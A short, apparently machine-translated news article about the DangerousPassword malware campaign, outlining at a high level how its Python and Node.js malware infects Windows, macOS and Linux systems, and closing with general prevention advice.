The campaign known as DangerousPassword it is rapidly spreading online, creating considerable concern among professionals and ordinary users.
In fact, the offensive acts on all the main desktop environments currently on the market, Windows, macOS e Linuxthrough malware known as Python e Node.js.
In this regard, cybercriminals trick users into downloading and running a malicious file, i.e builder.py, theoretically to handle QR codes. Once installed, this turns out to be the aforementioned Python malware, capable of harvesting data from the infected system and transmitting it to an server C2.
Under Windows, the malware downloads one or more file MSI executables from an external source during file transmission. One of these MSI files collects device information, while the other MSI file downloads an additional DLL file (deobj. dll) and transfers it up rdpclip.exe (a standard Windows program).
DangerousPassword: the risks associated with Python and Node.js malware
On macOS and Linux systems, after the Python malware reaches devices, the BASE64 encoded strings embedded are decoded and executed as Python files. After transmitting the system details to the C2, the malware downloads PythonHTTPBackdoor. In some cases, the researchers even became aware of the attack by infecting devices with other malware, JokerSpy.
In addition to Python malware, DangerousPassword also occasionally includes installation of other malicious files such as route.js e request.js. Node.js malware also follows a similar attack flow to its Python counterpart.
To avoid becoming one of the many victims of this campaign, it is important to effectively prevent a potential infection.
Great prudence when it comes to clicking on suspicious links and, even more, with respect to downloading files (executable and not) is essential. Finally, to counter DangerousPassword, it is extremely useful to adopt specific protection tools, such as antivirus, firewall and similar.
